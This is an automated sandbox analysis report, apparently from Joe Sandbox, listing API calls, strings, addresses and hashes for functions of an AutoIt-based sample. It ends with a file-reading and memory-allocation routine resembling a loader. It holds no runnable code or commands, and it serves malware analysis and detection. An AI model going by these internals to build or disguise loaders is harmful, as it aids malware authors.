• Opcode ID: 9ca553b79484b3a9b7cd9b6f8537491f422c99320bf2c0227bd79f0eb89a0a52
• Instruction ID: a91176218a3fa88f23c580e89f513a37551fe0305e3018c4c7d009bc121ef706
• Opcode Fuzzy Hash: 9ca553b79484b3a9b7cd9b6f8537491f422c99320bf2c0227bd79f0eb89a0a52
• Instruction Fuzzy Hash: 27115E79240700BFD7218B69EC58F677BBAFBC5B15F10426DF50586250DBA1E8049664
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: pbX$%U
• API String ID: 3964851224-3649209936
• Opcode ID: a8f026bf592068e6ae5d5b7e83faf04232a5889069d3444cc29d7f8e5ac1c832
• Instruction ID: 9f83816ddcefc2e9464ad8b6a8f5b12249b0b1553bd1f547e9ccc489ca2faec2
• Opcode Fuzzy Hash: a8f026bf592068e6ae5d5b7e83faf04232a5889069d3444cc29d7f8e5ac1c832
• Instruction Fuzzy Hash: 52929AB46083419FD720DF15C490B2BBBE1BF85304F14896EE98A8B392D779EC45CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID:
• String ID: DdX$DdX$DdX$DdX$Variable must be of type 'Object'.
• API String ID: 0-2831853225
• Opcode ID: 79b4cd4bfe8602805d18f7a55f6913079ee2cdbbbd14d16e8b8aac5d32298c64
• Instruction ID: 8a718e1814361260065a940c6f55482f754089a020c85c88d59d1d6d65d14afc
• Opcode Fuzzy Hash: 79b4cd4bfe8602805d18f7a55f6913079ee2cdbbbd14d16e8b8aac5d32298c64
• Instruction Fuzzy Hash: 26A28B79A00205CFCB64CF56C480FAEBBB6BF58314F24806ED905AB351D739AD46CB99
APIs
• GetFileAttributesW.KERNELBASE(?,004FE398), ref: 0052446A
• FindFirstFileW.KERNELBASE(?,?), ref: 0052447B
• FindClose.KERNEL32(00000000), ref: 0052448B
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: ed33549b8299e7d52780b0fc5eb09c2b2402f7ef285455a16cd72512ac1f14c2
• Instruction ID: 0734feab64c092b15879ce81742886223b987055316e43313e8f46fd2303a8cb
• Opcode Fuzzy Hash: ed33549b8299e7d52780b0fc5eb09c2b2402f7ef285455a16cd72512ac1f14c2
• Instruction Fuzzy Hash: ADE0D83A4149106B46107B3CFC4D4EE7B5CAE17339F100B16F936C10D0E7B45904AAD5
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D0A5B
                                                                                                                      • timeGetTime.WINMM ref: 004D0D16
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D0E53
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 004D0E61
                                                                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 004D0EFA
                                                                                                                      • DestroyWindow.USER32 ref: 004D0F06
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004D0F20
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00504E83
                                                                                                                      • TranslateMessage.USER32(?), ref: 00505C60
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00505C6E
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00505C82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbX$pbX$pbX$pbX
                                                                                                                      • API String ID: 4212290369-1252244754
                                                                                                                      • Opcode ID: a887f76e597549013b029d9acbf5046118eb87d32ae4e966ffa436e08c178ec3
                                                                                                                      • Instruction ID: 48b5e145ad6c47187479b9bb1723dd7d025ce658558c557a99dea24b5925e683
                                                                                                                      • Opcode Fuzzy Hash: a887f76e597549013b029d9acbf5046118eb87d32ae4e966ffa436e08c178ec3
                                                                                                                      • Instruction Fuzzy Hash: BBB2BE74608741DBD724DF24C894BAFBBE4BF84304F14491EE88A972A1DB74E884DF96

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00528F5F: __time64.LIBCMT ref: 00528F69
                                                                                                                        • Part of subcall function 004C4EE5: _fseek.LIBCMT ref: 004C4EFD
                                                                                                                      • __wsplitpath.LIBCMT ref: 00529234
                                                                                                                        • Part of subcall function 004E40FB: __wsplitpath_helper.LIBCMT ref: 004E413B
                                                                                                                      • _wcscpy.LIBCMT ref: 00529247
                                                                                                                      • _wcscat.LIBCMT ref: 0052925A
                                                                                                                      • __wsplitpath.LIBCMT ref: 0052927F
                                                                                                                      • _wcscat.LIBCMT ref: 00529295
                                                                                                                      • _wcscat.LIBCMT ref: 005292A8
                                                                                                                        • Part of subcall function 00528FA5: _memmove.LIBCMT ref: 00528FDE
                                                                                                                        • Part of subcall function 00528FA5: _memmove.LIBCMT ref: 00528FED
                                                                                                                      • _wcscmp.LIBCMT ref: 005291EF
                                                                                                                        • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529824
                                                                                                                        • Part of subcall function 00529734: _wcscmp.LIBCMT ref: 00529837
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00529452
                                                                                                                      • _wcsncpy.LIBCMT ref: 005294C5
                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 005294FB
                                                                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00529511
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00529522
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00529534
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1500180987-0
                                                                                                                      • Opcode ID: a7a274c865b53aa292ce638e8d86f430bde7157af9414274551b602845267562
                                                                                                                      • Instruction ID: a0148b94f944d54de99a97694af58a086e2058de8edb2900ae27135b9cbd1c0c
                                                                                                                      • Opcode Fuzzy Hash: a7a274c865b53aa292ce638e8d86f430bde7157af9414274551b602845267562
                                                                                                                      • Instruction Fuzzy Hash: 26C16FB1E00129ABDF11DF95DC85EDEBBBCEF95314F0040AAF609E6281DB349A448F65

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004C3074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 004C309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C30AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 004C30CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004C30DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 004C30F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004C3101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: c47033a92d6cc45923ca9ebe57d8c6ce122c06d960798a527b24f438e97af572
                                                                                                                      • Instruction ID: 7681ca4b41290ad64442a626c998f3e5773324bda0094e6e2b307c3b46818203
                                                                                                                      • Opcode Fuzzy Hash: c47033a92d6cc45923ca9ebe57d8c6ce122c06d960798a527b24f438e97af572
                                                                                                                      • Instruction Fuzzy Hash: 49314875840345AFDB10CFA8E888ADDBFF0FF19314F24456EE581A62A0E3B90588DF51

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004C3074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 004C309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C30AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 004C30CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004C30DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 004C30F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004C3101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 4f77d6639a9a71f6e9439c0d0de273888303f8b47d3512be136e54620293556f
                                                                                                                      • Instruction ID: 5a5249f8a3faf85fa56553bc9af2fed7cc8cc1f0d829ede64cc88574ef7a39be
                                                                                                                      • Opcode Fuzzy Hash: 4f77d6639a9a71f6e9439c0d0de273888303f8b47d3512be136e54620293556f
                                                                                                                      • Instruction Fuzzy Hash: D321E5B9941208AFDB00DFA8E848BDDBBF4FB19704F10512AF911A62A0E7B54548AF91

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005852F8,?,004C37AE,?), ref: 004C4724
                                                                                                                        • Part of subcall function 004E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004C7165), ref: 004E052D
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004C71A8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004FE8C8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004FE909
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004FE947
                                                                                                                      • _wcscat.LIBCMT ref: 004FE9A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                      • Opcode ID: 8265f5d003023977c3967ffd2a2afe4dc27c923a18fc0bbe59752c29ed7fcce1
                                                                                                                      • Instruction ID: ab8bddf71537b82fcb443046c05eb210958dc67f20a5043274071fc5469f773f
                                                                                                                      • Opcode Fuzzy Hash: 8265f5d003023977c3967ffd2a2afe4dc27c923a18fc0bbe59752c29ed7fcce1
                                                                                                                      • Instruction Fuzzy Hash: 64718B791083019EC300EF2AEC41EABBBE8FF94354F40492FF946972A0DB759948DB56

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004C36D2
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 004C36FC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004C371F
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C372A
                                                                                                                      • CreatePopupMenu.USER32 ref: 004C373E
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 004C374D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated$%U
                                                                                                                      • API String ID: 129472671-1396545613
                                                                                                                      • Opcode ID: d4641753af434671429807bcbb1cba3a74a59a5850a49197b9efbf1dbeed4b8e
                                                                                                                      • Instruction ID: 7c057e4653296df558a217338552b9fc491af6e07b17acdc667f8032772c2cc8
                                                                                                                      • Opcode Fuzzy Hash: d4641753af434671429807bcbb1cba3a74a59a5850a49197b9efbf1dbeed4b8e
                                                                                                                      • Instruction Fuzzy Hash: E3412C7D200505BBDB646F68EC09F7A3B95EB11306F10812FF902A63A1DA6C5D05A76E

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004C3A50
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004C3A5F
                                                                                                                      • LoadIconW.USER32(00000063), ref: 004C3A76
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 004C3A88
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 004C3A9A
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004C3AC0
                                                                                                                      • RegisterClassExW.USER32(?), ref: 004C3B16
                                                                                                                        • Part of subcall function 004C3041: GetSysColorBrush.USER32(0000000F), ref: 004C3074
                                                                                                                        • Part of subcall function 004C3041: RegisterClassExW.USER32(00000030), ref: 004C309E
                                                                                                                        • Part of subcall function 004C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004C30AF
                                                                                                                        • Part of subcall function 004C3041: InitCommonControlsEx.COMCTL32(?), ref: 004C30CC
                                                                                                                        • Part of subcall function 004C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004C30DC
                                                                                                                        • Part of subcall function 004C3041: LoadIconW.USER32(000000A9), ref: 004C30F2
                                                                                                                        • Part of subcall function 004C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004C3101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 7d33a2882625e17d1e00052a2483abfb1df8e837bdfa57be00ac4c03c3b18bff
                                                                                                                      • Instruction ID: 4d6f6a1e0b397f47680857f1e89f10265621de139caafb1974620c5b870f61f0
                                                                                                                      • Opcode Fuzzy Hash: 7d33a2882625e17d1e00052a2483abfb1df8e837bdfa57be00ac4c03c3b18bff
                                                                                                                      • Instruction Fuzzy Hash: 67214F79D00304AFEB10DFA4EC49B9D7BB0FB18715F00511AE901B62A1E7B95958AF84

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RX
                                                                                                                      • API String ID: 1825951767-4033668682
                                                                                                                      • Opcode ID: 710ada920dd1b7db84c2dc0d46f93b3f4a0e49131a02199016c38431c58bc9d9
                                                                                                                      • Instruction ID: d5d15dd0f9d821fe23c44155a279d6fb360f25ec3405a48e0828468de1854754
                                                                                                                      • Opcode Fuzzy Hash: 710ada920dd1b7db84c2dc0d46f93b3f4a0e49131a02199016c38431c58bc9d9
                                                                                                                      • Instruction Fuzzy Hash: 51A15C7990021D9ACB44EFA6DC55EEEB779BF14308F00442EF416B7191EF786A08CB68

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004E0193
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 004E019B
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004E01A6
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004E01B1
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004E01B9
                                                                                                                        • Part of subcall function 004E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004E01C1
                                                                                                                        • Part of subcall function 004D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004CF930), ref: 004D6154
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004CF9CD
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004CFA4A
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 005045C8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                      • String ID: <WX$\TX$%U$SX
                                                                                                                      • API String ID: 1986988660-1343472353
                                                                                                                      • Opcode ID: c0b2715454ad1be72b130be551be7d2ebcd78459f67927d899c650f79c0e780c
                                                                                                                      • Instruction ID: d66d85b3c486af25e2950621e1193f016a6be513b3ec758fcdfdc1efa2158f3c
                                                                                                                      • Opcode Fuzzy Hash: c0b2715454ad1be72b130be551be7d2ebcd78459f67927d899c650f79c0e780c
                                                                                                                      • Instruction Fuzzy Hash: F781C1B4901A40CFCB84EF39A8506197FE5FB68346750A52EAC19EB372FB74048CAF15

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 983 1108460-110850e call 1105e70 986 1108515-110853b call 1109370 CreateFileW 983->986 989 1108542-1108552 986->989 990 110853d 986->990 995 1108554 989->995 996 1108559-1108573 VirtualAlloc 989->996 991 110868d-1108691 990->991 993 11086d3-11086d6 991->993 994 1108693-1108697 991->994 997 11086d9-11086e0 993->997 998 11086a3-11086a7 994->998 999 1108699-110869c 994->999 995->991 1002 1108575 996->1002 1003 110857a-1108591 ReadFile 996->1003 1004 11086e2-11086ed 997->1004 1005 1108735-110874a 997->1005 1000 11086b7-11086bb 998->1000 1001 11086a9-11086b3 998->1001 999->998 1008 11086cb 1000->1008 1009 11086bd-11086c7 1000->1009 1001->1000 1002->991 1010 1108593 1003->1010 1011 1108598-11085d8 VirtualAlloc 1003->1011 1012 11086f1-11086fd 1004->1012 1013 11086ef 1004->1013 1006 110875a-1108762 1005->1006 1007 110874c-1108757 VirtualFree 1005->1007 1007->1006 1008->993 1009->1008 1010->991 1014 11085da 1011->1014 1015 11085df-11085fa call 11095c0 1011->1015 1016 1108711-110871d 1012->1016 1017 11086ff-110870f 1012->1017 1013->1005 1014->991 1023 1108605-110860f 1015->1023 1018 110872a-1108730 1016->1018 1019 110871f-1108728 1016->1019 1021 1108733 1017->1021 1018->1021 1019->1021 1021->997 1024 1108611-1108640 call 11095c0 1023->1024 1025 1108642-1108656 call 11093d0 1023->1025 1024->1023 1031 1108658 1025->1031 1032 110865a-110865e 1025->1032 1031->991 1033 1108660-1108664 CloseHandle 1032->1033 1034 110866a-110866e 1032->1034 1033->1034 1035 1108670-110867b VirtualFree 1034->1035 1036 110867e-1108687 1034->1036 1035->1036 1036->986 1036->991
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01108531
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01108757
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
